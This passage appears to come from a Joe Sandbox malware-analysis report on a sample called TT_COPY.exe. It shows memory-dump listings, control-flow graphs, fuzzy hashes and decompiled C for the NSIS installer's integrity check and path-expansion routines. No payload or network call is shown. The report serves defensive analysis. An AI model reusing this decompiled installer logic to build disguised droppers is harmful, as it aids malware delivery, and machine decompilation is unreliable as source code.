                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                            • API String ID: 1975747703-3228750522
                                                                                                                            • Opcode ID: 5a24b6ccf2dff8f69514c8993659dfa0179b66eb04d645246d0b4e575a356aee
                                                                                                                            • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                            • Opcode Fuzzy Hash: 5a24b6ccf2dff8f69514c8993659dfa0179b66eb04d645246d0b4e575a356aee
                                                                                                                            • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 324 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 327 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 324->327 328 4030cd-4030d2 324->328 336 4031f0-4031fe call 403019 327->336 337 40310b 327->337 329 4032ad-4032b1 328->329 343 403200-403203 336->343 344 403253-403258 336->344 339 403110-403127 337->339 341 403129 339->341 342 40312b-403134 call 4034cf 339->342 341->342 349 40325a-403262 call 403019 342->349 350 40313a-403141 342->350 346 403205-40321d call 4034e5 call 4034cf 343->346 347 403227-403251 GlobalAlloc call 4034e5 call 4032b4 343->347 344->329 346->344 371 40321f-403225 346->371 347->344 375 403264-403275 347->375 349->344 353 403143-403157 call 405fe8 350->353 354 4031bd-4031c1 350->354 362 4031cb-4031d1 353->362 373 403159-403160 353->373 361 4031c3-4031ca call 403019 354->361 354->362 361->362 364 4031e0-4031e8 362->364 365 4031d3-4031dd call 4069f7 362->365 364->339 374 4031ee 364->374 365->364 371->344 371->347 373->362 377 403162-403169 373->377 374->336 378 403277 375->378 379 40327d-403282 375->379 377->362 380 40316b-403172 377->380 378->379 381 403283-403289 379->381 380->362 382 403174-40317b 380->382 381->381 383 40328b-4032a6 SetFilePointer call 405fe8 381->383 382->362 384 40317d-40319d 382->384 386 4032ab 383->386 384->344 387 4031a3-4031a7 384->387 386->329 388 4031a9-4031ad 387->388 389 4031af-4031b7 387->389 388->374 388->389 389->362 390 4031b9-4031bb 389->390 390->362
                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E0040307D(void* __eflags, signed int _a4) {
                                                                                                                            				DWORD* _v8;
                                                                                                                            				DWORD* _v12;
                                                                                                                            				void* _v16;
                                                                                                                            				intOrPtr _v20;
                                                                                                                            				char _v24;
                                                                                                                            				intOrPtr _v28;
                                                                                                                            				intOrPtr _v32;
                                                                                                                            				intOrPtr _v36;
                                                                                                                            				intOrPtr _v40;
                                                                                                                            				signed int _v44;
                                                                                                                            				long _t43;
                                                                                                                            				long _t50;
                                                                                                                            				void* _t53;
                                                                                                                            				void* _t57;
                                                                                                                            				intOrPtr* _t59;
                                                                                                                            				long _t60;
                                                                                                                            				long _t70;
                                                                                                                            				signed int _t77;
                                                                                                                            				intOrPtr _t80;
                                                                                                                            				long _t82;
                                                                                                                            				void* _t85;
                                                                                                                            				signed int _t87;
                                                                                                                            				void* _t89;
                                                                                                                            				long _t90;
                                                                                                                            				long _t93;
                                                                                                                            				void* _t94;
                                                                                                                            
                                                                                                                            				_t82 = 0;
                                                                                                                            				_v12 = 0;
                                                                                                                            				_v8 = 0;
                                                                                                                            				_t43 = GetTickCount();
                                                                                                                            				_t91 = L"C:\\Users\\Arthur\\Desktop\\TT_COPY.exe";
                                                                                                                            				 *0x434f0c = _t43 + 0x3e8;
                                                                                                                            				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\TT_COPY.exe", 0x400);
                                                                                                                            				_t89 = E0040602D(_t91, 0x80000000, 3);
                                                                                                                            				_v16 = _t89;
                                                                                                                            				 *0x40a018 = _t89;
                                                                                                                            				if(_t89 == 0xffffffff) {
                                                                                                                            					return L"Error launching installer";
                                                                                                                            				}
                                                                                                                            				E0040653D(0x441800, _t91);
                                                                                                                            				E0040653D(0x444000, E00405E58(0x441800));
                                                                                                                            				_t50 = GetFileSize(_t89, 0);
                                                                                                                            				 *0x42aa24 = _t50;
                                                                                                                            				_t93 = _t50;
                                                                                                                            				if(_t50 <= 0) {
                                                                                                                            					L24:
                                                                                                                            					E00403019(1);
                                                                                                                            					if( *0x434f14 == _t82) {
                                                                                                                            						goto L29;
                                                                                                                            					}
                                                                                                                            					if(_v8 == _t82) {
                                                                                                                            						L28:
                                                                                                                            						_t34 =  &_v24; // 0x40387d
                                                                                                                            						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                                                                                            						_t94 = _t53;
                                                                                                                            						E004034E5( *0x434f14 + 0x1c);
                                                                                                                            						_t35 =  &_v24; // 0x40387d
                                                                                                                            						_push( *_t35);
                                                                                                                            						_push(_t94);
                                                                                                                            						_push(_t82);
                                                                                                                            						_push(0xffffffff); // executed
                                                                                                                            						_t57 = E004032B4(); // executed
                                                                                                                            						if(_t57 == _v24) {
                                                                                                                            							 *0x434f10 = _t94;
                                                                                                                            							 *0x434f18 =  *_t94;
                                                                                                                            							if((_v44 & 0x00000001) != 0) {
                                                                                                                            								 *0x434f1c =  *0x434f1c + 1;
                                                                                                                            							}
                                                                                                                            							_t40 = _t94 + 0x44; // 0x44
                                                                                                                            							_t59 = _t40;
                                                                                                                            							_t85 = 8;
                                                                                                                            							do {
                                                                                                                            								_t59 = _t59 - 8;
                                                                                                                            								 *_t59 =  *_t59 + _t94;
                                                                                                                            								_t85 = _t85 - 1;
                                                                                                                            							} while (_t85 != 0);
                                                                                                                            							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                                                            							 *(_t94 + 0x3c) = _t60;
                                                                                                                            							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                                                                                            							return 0;
                                                                                                                            						}
                                                                                                                            						goto L29;
                                                                                                                            					}
                                                                                                                            					E004034E5( *0x41ea18);
                                                                                                                            					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
                                                                                                                            						goto L29;
                                                                                                                            					} else {
                                                                                                                            						goto L28;
                                                                                                                            					}
                                                                                                                            				} else {
                                                                                                                            					do {
                                                                                                                            						_t90 = _t93;
                                                                                                                            						asm("sbb eax, eax");
                                                                                                                            						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                                                                                            						if(_t93 >= _t70) {
                                                                                                                            							_t90 = _t70;
                                                                                                                            						}
                                                                                                                            						if(E004034CF(0x416a18, _t90) == 0) {
                                                                                                                            							E00403019(1);
                                                                                                                            							L29:
                                                                                                                            							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                            						}
                                                                                                                            						if( *0x434f14 != 0) {
                                                                                                                            							if((_a4 & 0x00000002) == 0) {
                                                                                                                            								E00403019(0);
                                                                                                                            							}
                                                                                                                            							goto L20;
                                                                                                                            						}
                                                                                                                            						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                                                                                            						_t77 = _v44;
                                                                                                                            						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                                                                                            							_a4 = _a4 | _t77;
                                                                                                                            							_t87 =  *0x41ea18; // 0x61985
                                                                                                                            							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                                                                                            							_t80 = _v20;
                                                                                                                            							 *0x434f14 = _t87;
                                                                                                                            							if(_t80 > _t93) {
                                                                                                                            								goto L29;
                                                                                                                            							}
                                                                                                                            							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                                                            								_v8 = _v8 + 1;
                                                                                                                            								_t93 = _t80 - 4;
                                                                                                                            								if(_t90 > _t93) {
                                                                                                                            									_t90 = _t93;
                                                                                                                            								}
                                                                                                                            								goto L20;
                                                                                                                            							} else {
                                                                                                                            								break;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						L20:
                                                                                                                            						if(_t93 <  *0x42aa24) {
                                                                                                                            							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                                                                                            						}
                                                                                                                            						 *0x41ea18 =  *0x41ea18 + _t90;
                                                                                                                            						_t93 = _t93 - _t90;
                                                                                                                            					} while (_t93 != 0);
                                                                                                                            					_t82 = 0;
                                                                                                                            					goto L24;
                                                                                                                            				}
                                                                                                                            			}





























                                                                                                                            0x00403085
                                                                                                                            0x00403088
                                                                                                                            0x0040308b
                                                                                                                            0x0040308e
                                                                                                                            0x00403094
                                                                                                                            0x004030a5
                                                                                                                            0x004030aa
                                                                                                                            0x004030bd
                                                                                                                            0x004030c2
                                                                                                                            0x004030c5
                                                                                                                            0x004030cb
                                                                                                                            0x00000000
                                                                                                                            0x004030cd
                                                                                                                            0x004030de
                                                                                                                            0x004030ef
                                                                                                                            0x004030f6
                                                                                                                            0x004030fe
                                                                                                                            0x00403103
                                                                                                                            0x00403105
                                                                                                                            0x004031f0
                                                                                                                            0x004031f2
                                                                                                                            0x004031fe
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403203
                                                                                                                            0x00403227
                                                                                                                            0x00403227
                                                                                                                            0x0040322c
                                                                                                                            0x00403232
                                                                                                                            0x0040323d
                                                                                                                            0x00403242
                                                                                                                            0x00403242
                                                                                                                            0x00403245
                                                                                                                            0x00403246
                                                                                                                            0x00403247
                                                                                                                            0x00403249
                                                                                                                            0x00403251
                                                                                                                            0x00403268
                                                                                                                            0x00403270
                                                                                                                            0x00403275
                                                                                                                            0x00403277
                                                                                                                            0x00403277
                                                                                                                            0x0040327f
                                                                                                                            0x0040327f
                                                                                                                            0x00403282
                                                                                                                            0x00403283
                                                                                                                            0x00403283
                                                                                                                            0x00403286
                                                                                                                            0x00403288
                                                                                                                            0x00403288
                                                                                                                            0x00403292
                                                                                                                            0x00403298
                                                                                                                            0x004032a6
                                                                                                                            0x00000000
                                                                                                                            0x004032ab
                                                                                                                            0x00000000
                                                                                                                            0x00403251
                                                                                                                            0x0040320b
                                                                                                                            0x0040321d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040310b
                                                                                                                            0x00403110
                                                                                                                            0x00403115
                                                                                                                            0x00403119
                                                                                                                            0x00403120
                                                                                                                            0x00403127
                                                                                                                            0x00403129
                                                                                                                            0x00403129
                                                                                                                            0x00403134
                                                                                                                            0x0040325c
                                                                                                                            0x00403253
                                                                                                                            0x00000000
                                                                                                                            0x00403253
                                                                                                                            0x00403141
                                                                                                                            0x004031c1
                                                                                                                            0x004031c5
                                                                                                                            0x004031ca
                                                                                                                            0x00000000
                                                                                                                            0x004031c1
                                                                                                                            0x0040314a
                                                                                                                            0x0040314f
                                                                                                                            0x00403157
                                                                                                                            0x0040317d
                                                                                                                            0x00403183
                                                                                                                            0x0040318c
                                                                                                                            0x00403192
                                                                                                                            0x00403197
                                                                                                                            0x0040319d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004031a7
                                                                                                                            0x004031af
                                                                                                                            0x004031b2
                                                                                                                            0x004031b7
                                                                                                                            0x004031b9
                                                                                                                            0x004031b9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004031a7
                                                                                                                            0x004031cb
                                                                                                                            0x004031d1
                                                                                                                            0x004031dd
                                                                                                                            0x004031dd
                                                                                                                            0x004031e0
                                                                                                                            0x004031e6
                                                                                                                            0x004031e6
                                                                                                                            0x004031ee
                                                                                                                            0x00000000
                                                                                                                            0x004031ee

                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TT_COPY.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\TT_COPY.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\Desktop\TT_COPY.exe,C:\Users\user\Desktop\TT_COPY.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\TT_COPY.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                            • API String ID: 2803837635-952586303
                                                                                                                            • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                            • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                            • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                            • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 676 40657a-406585 677 406587-406596 676->677 678 406598-4065ae 676->678 677->678 679 4065b0-4065bd 678->679 680 4065c6-4065cf 678->680 679->680 683 4065bf-4065c2 679->683 681 4065d5 680->681 682 4067aa-4067b5 680->682 684 4065da-4065e7 681->684 685 4067c0-4067c1 682->685 686 4067b7-4067bb call 40653d 682->686 683->680 684->682 687 4065ed-4065f6 684->687 686->685 689 406788 687->689 690 4065fc-406639 687->690 693 406796-406799 689->693 694 40678a-406794 689->694 691 40672c-406731 690->691 692 40663f-406646 690->692 696 406733-406739 691->696 697 406764-406769 691->697 698 406648-40664a 692->698 699 40664b-40664d 692->699 695 40679b-4067a4 693->695 694->695 695->682 700 4065d7 695->700 701 406749-406755 call 40653d 696->701 702 40673b-406747 call 406484 696->702 705 406778-406786 lstrlenW 697->705 706 40676b-406773 call 40657a 697->706 698->699 703 40668a-40668d 699->703 704 40664f-40666d call 40640b 699->704 700->684 717 40675a-406760 701->717 702->717 711 40669d-4066a0 703->711 712 40668f-40669b GetSystemDirectoryW 703->712 718 406672-406676 704->718 705->695 706->705 714 4066a2-4066b0 GetWindowsDirectoryW 711->714 715 406709-40670b 711->715 713 40670d-406711 712->713 721 406713-406717 713->721 722 406724-40672a call 4067c4 713->722 714->715 715->713 720 4066b2-4066ba 715->720 717->705 719 406762 717->719 718->721 723 40667c-406685 call 40657a 718->723 719->722 724 4066d1-4066e7 SHGetSpecialFolderLocation 720->724 725 4066bc-4066c5 720->725 721->722 726 406719-40671f lstrcatW 721->726 722->705 723->713 729 406705 724->729 730 4066e9-406703 SHGetPathFromIDListW CoTaskMemFree 724->730 733 4066cd-4066cf 725->733 726->722 729->715 730->713 730->729 733->713 733->724
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                                                                            				struct _ITEMIDLIST* _v8;
                                                                                                                            				signed int _v12;
                                                                                                                            				signed int _v16;
                                                                                                                            				signed int _v20;
                                                                                                                            				signed int _v24;
                                                                                                                            				signed int _v28;
                                                                                                                            				signed int _t44;
                                                                                                                            				WCHAR* _t45;
                                                                                                                            				signed char _t47;
                                                                                                                            				signed int _t48;
                                                                                                                            				short _t59;
                                                                                                                            				short _t61;
                                                                                                                            				short _t63;
                                                                                                                            				void* _t71;
                                                                                                                            				signed int _t77;
                                                                                                                            				signed int _t78;
                                                                                                                            				short _t81;
                                                                                                                            				short _t82;
                                                                                                                            				signed char _t84;
                                                                                                                            				signed int _t85;
                                                                                                                            				void* _t98;
                                                                                                                            				void* _t104;
                                                                                                                            				intOrPtr* _t105;
                                                                                                                            				void* _t107;
                                                                                                                            				WCHAR* _t108;
                                                                                                                            				void* _t110;
                                                                                                                            
                                                                                                                            				_t107 = __esi;
                                                                                                                            				_t104 = __edi;
                                                                                                                            				_t71 = __ebx;
                                                                                                                            				_t44 = _a8;
                                                                                                                            				if(_t44 < 0) {
                                                                                                                            					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                                                                                                                            				}
                                                                                                                            				_push(_t71);
                                                                                                                            				_push(_t107);
                                                                                                                            				_push(_t104);
                                                                                                                            				_t105 =  *0x434f38 + _t44 * 2;
                                                                                                                            				_t45 = 0x432ea0;
                                                                                                                            				_t108 = 0x432ea0;
                                                                                                                            				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                                                                                            					_t108 = _a4;
                                                                                                                            					_a4 = _a4 & 0x00000000;
                                                                                                                            				}
                                                                                                                            				_t81 =  *_t105;
                                                                                                                            				_a8 = _t81;
                                                                                                                            				if(_t81 == 0) {
                                                                                                                            					L43:
                                                                                                                            					 *_t108 =  *_t108 & 0x00000000;
                                                                                                                            					if(_a4 == 0) {
                                                                                                                            						return _t45;
                                                                                                                            					}
                                                                                                                            					return E0040653D(_a4, _t45);
                                                                                                                            				} else {
                                                                                                                            					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                                                                            						_t98 = 2;
                                                                                                                            						_t105 = _t105 + _t98;
                                                                                                                            						if(_t81 >= 4) {
                                                                                                                            							if(__eflags != 0) {
                                                                                                                            								 *_t108 = _t81;
                                                                                                                            								_t108 = _t108 + _t98;
                                                                                                                            								__eflags = _t108;
                                                                                                                            							} else {
                                                                                                                            								 *_t108 =  *_t105;
                                                                                                                            								_t108 = _t108 + _t98;
                                                                                                                            								_t105 = _t105 + _t98;
                                                                                                                            							}
                                                                                                                            							L42:
                                                                                                                            							_t82 =  *_t105;
                                                                                                                            							_a8 = _t82;
                                                                                                                            							if(_t82 != 0) {
                                                                                                                            								_t81 = _a8;
                                                                                                                            								continue;
                                                                                                                            							}
                                                                                                                            							goto L43;
                                                                                                                            						}
                                                                                                                            						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                                                                            						_t47 =  *_t105;
                                                                                                                            						_t48 = _t47 & 0x000000ff;
                                                                                                                            						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                                                                            						_t85 = _t84 & 0x000000ff;
                                                                                                                            						_v28 = _t48 | 0x00008000;
                                                                                                                            						_t77 = 2;
                                                                                                                            						_v16 = _t85;
                                                                                                                            						_t105 = _t105 + _t77;
                                                                                                                            						_v24 = _t48;
                                                                                                                            						_v20 = _t85 | 0x00008000;
                                                                                                                            						if(_a8 != _t77) {
                                                                                                                            							__eflags = _a8 - 3;
                                                                                                                            							if(_a8 != 3) {
                                                                                                                            								__eflags = _a8 - 1;
                                                                                                                            								if(__eflags == 0) {
                                                                                                                            									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                                                                            									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                                                                            								}
                                                                                                                            								L38:
                                                                                                                            								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                                                                            								_t45 = 0x432ea0;
                                                                                                                            								goto L42;
                                                                                                                            							}
                                                                                                                            							_t78 = _v12;
                                                                                                                            							__eflags = _t78 - 0x1d;
                                                                                                                            							if(_t78 != 0x1d) {
                                                                                                                            								__eflags = (_t78 << 0xb) + 0x436000;
                                                                                                                            								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                                                                                            							} else {
                                                                                                                            								E00406484(_t108,  *0x434f08);
                                                                                                                            							}
                                                                                                                            							__eflags = _t78 + 0xffffffeb - 7;
                                                                                                                            							if(__eflags < 0) {
                                                                                                                            								L29:
                                                                                                                            								E004067C4(_t108);
                                                                                                                            							}
                                                                                                                            							goto L38;
                                                                                                                            						}
                                                                                                                            						if( *0x434f84 != 0) {
                                                                                                                            							_t77 = 4;
                                                                                                                            						}
                                                                                                                            						_t121 = _t48;
                                                                                                                            						if(_t48 >= 0) {
                                                                                                                            							__eflags = _t48 - 0x25;
                                                                                                                            							if(_t48 != 0x25) {
                                                                                                                            								__eflags = _t48 - 0x24;
                                                                                                                            								if(_t48 == 0x24) {
                                                                                                                            									GetWindowsDirectoryW(_t108, 0x400);
                                                                                                                            									_t77 = 0;
                                                                                                                            								}
                                                                                                                            								while(1) {
                                                                                                                            									__eflags = _t77;
                                                                                                                            									if(_t77 == 0) {
                                                                                                                            										goto L26;
                                                                                                                            									}
                                                                                                                            									_t59 =  *0x434f04;
                                                                                                                            									_t77 = _t77 - 1;
                                                                                                                            									__eflags = _t59;
                                                                                                                            									if(_t59 == 0) {
                                                                                                                            										L22:
                                                                                                                            										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                                                                            										__eflags = _t61;
                                                                                                                            										if(_t61 != 0) {
                                                                                                                            											L24:
                                                                                                                            											 *_t108 =  *_t108 & 0x00000000;
                                                                                                                            											__eflags =  *_t108;
                                                                                                                            											continue;
                                                                                                                            										}
                                                                                                                            										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                                                                            										_a8 = _t61;
                                                                                                                            										__imp__CoTaskMemFree(_v8);
                                                                                                                            										__eflags = _a8;
                                                                                                                            										if(_a8 != 0) {
                                                                                                                            											goto L26;
                                                                                                                            										}
                                                                                                                            										goto L24;
                                                                                                                            									}
                                                                                                                            									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
                                                                                                                            									__eflags = _t63;
                                                                                                                            									if(_t63 == 0) {
                                                                                                                            										goto L26;
                                                                                                                            									}
                                                                                                                            									goto L22;
                                                                                                                            								}
                                                                                                                            								goto L26;
                                                                                                                            							}
                                                                                                                            							GetSystemDirectoryW(_t108, 0x400);
                                                                                                                            							goto L26;
                                                                                                                            						} else {
                                                                                                                            							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040); // executed
                                                                                                                            							if( *_t108 != 0) {
                                                                                                                            								L27:
                                                                                                                            								if(_v16 == 0x1a) {
                                                                                                                            									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                            								}
                                                                                                                            								goto L29;
                                                                                                                            							}
                                                                                                                            							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                                                                                            							L26:
                                                                                                                            							if( *_t108 == 0) {
                                                                                                                            								goto L29;
                                                                                                                            							}
                                                                                                                            							goto L27;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					goto L43;
                                                                                                                            				}
                                                                                                                            			}





























                                                                                                                            0x0040657a
                                                                                                                            0x0040657a
                                                                                                                            0x0040657a
                                                                                                                            0x00406580
                                                                                                                            0x00406585
                                                                                                                            0x00406596
                                                                                                                            0x00406596
                                                                                                                            0x0040659e
                                                                                                                            0x0040659f
                                                                                                                            0x004065a0
                                                                                                                            0x004065a1
                                                                                                                            0x004065a4
                                                                                                                            0x004065ac
                                                                                                                            0x004065ae
                                                                                                                            0x004065bf
                                                                                                                            0x004065c2
                                                                                                                            0x004065c2
                                                                                                                            0x004065c6
                                                                                                                            0x004065cc
                                                                                                                            0x004065cf
                                                                                                                            0x004067aa
                                                                                                                            0x004067aa
                                                                                                                            0x004067b5
                                                                                                                            0x004067c1
                                                                                                                            0x004067c1
                                                                                                                            0x00000000
                                                                                                                            0x004065d5
                                                                                                                            0x004065da
                                                                                                                            0x004065ef
                                                                                                                            0x004065f0
                                                                                                                            0x004065f6
                                                                                                                            0x00406788
                                                                                                                            0x00406796
                                                                                                                            0x00406799
                                                                                                                            0x00406799
                                                                                                                            0x0040678a
                                                                                                                            0x0040678d
                                                                                                                            0x00406790
                                                                                                                            0x00406792
                                                                                                                            0x00406792
                                                                                                                            0x0040679b
                                                                                                                            0x0040679b
                                                                                                                            0x004067a1
                                                                                                                            0x004067a4
                                                                                                                            0x004065d7
                                                                                                                            0x00000000
                                                                                                                            0x004065d7
                                                                                                                            0x00000000
                                                                                                                            0x004067a4
                                                                                                                            0x004065fc
                                                                                                                            0x004065ff
                                                                                                                            0x0040660e
                                                                                                                            0x00406615
                                                                                                                            0x00406621
                                                                                                                            0x00406624
                                                                                                                            0x00406627
                                                                                                                            0x00406628
                                                                                                                            0x0040662d
                                                                                                                            0x00406633
                                                                                                                            0x00406636
                                                                                                                            0x00406639
                                                                                                                            0x0040672c
                                                                                                                            0x00406731
                                                                                                                            0x00406764
                                                                                                                            0x00406769
                                                                                                                            0x0040676e
                                                                                                                            0x00406773
                                                                                                                            0x00406773
                                                                                                                            0x00406778
                                                                                                                            0x0040677e
                                                                                                                            0x00406781
                                                                                                                            0x00000000
                                                                                                                            0x00406781
                                                                                                                            0x00406733
                                                                                                                            0x00406736
                                                                                                                            0x00406739
                                                                                                                            0x0040674e
                                                                                                                            0x00406755
                                                                                                                            0x0040673b
                                                                                                                            0x00406742
                                                                                                                            0x00406742
                                                                                                                            0x0040675d
                                                                                                                            0x00406760
                                                                                                                            0x00406724
                                                                                                                            0x00406725
                                                                                                                            0x00406725
                                                                                                                            0x00000000
                                                                                                                            0x00406760
                                                                                                                            0x00406646
                                                                                                                            0x0040664a
                                                                                                                            0x0040664a
                                                                                                                            0x0040664b
                                                                                                                            0x0040664d
                                                                                                                            0x0040668a
                                                                                                                            0x0040668d
                                                                                                                            0x0040669d
                                                                                                                            0x004066a0
                                                                                                                            0x004066a8
                                                                                                                            0x004066ae
                                                                                                                            0x004066ae
                                                                                                                            0x00406709
                                                                                                                            0x00406709
                                                                                                                            0x0040670b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004066b2
                                                                                                                            0x004066b7
                                                                                                                            0x004066b8
                                                                                                                            0x004066ba
                                                                                                                            0x004066d1
                                                                                                                            0x004066df
                                                                                                                            0x004066e5
                                                                                                                            0x004066e7
                                                                                                                            0x00406705
                                                                                                                            0x00406705
                                                                                                                            0x00406705
                                                                                                                            0x00000000
                                                                                                                            0x00406705
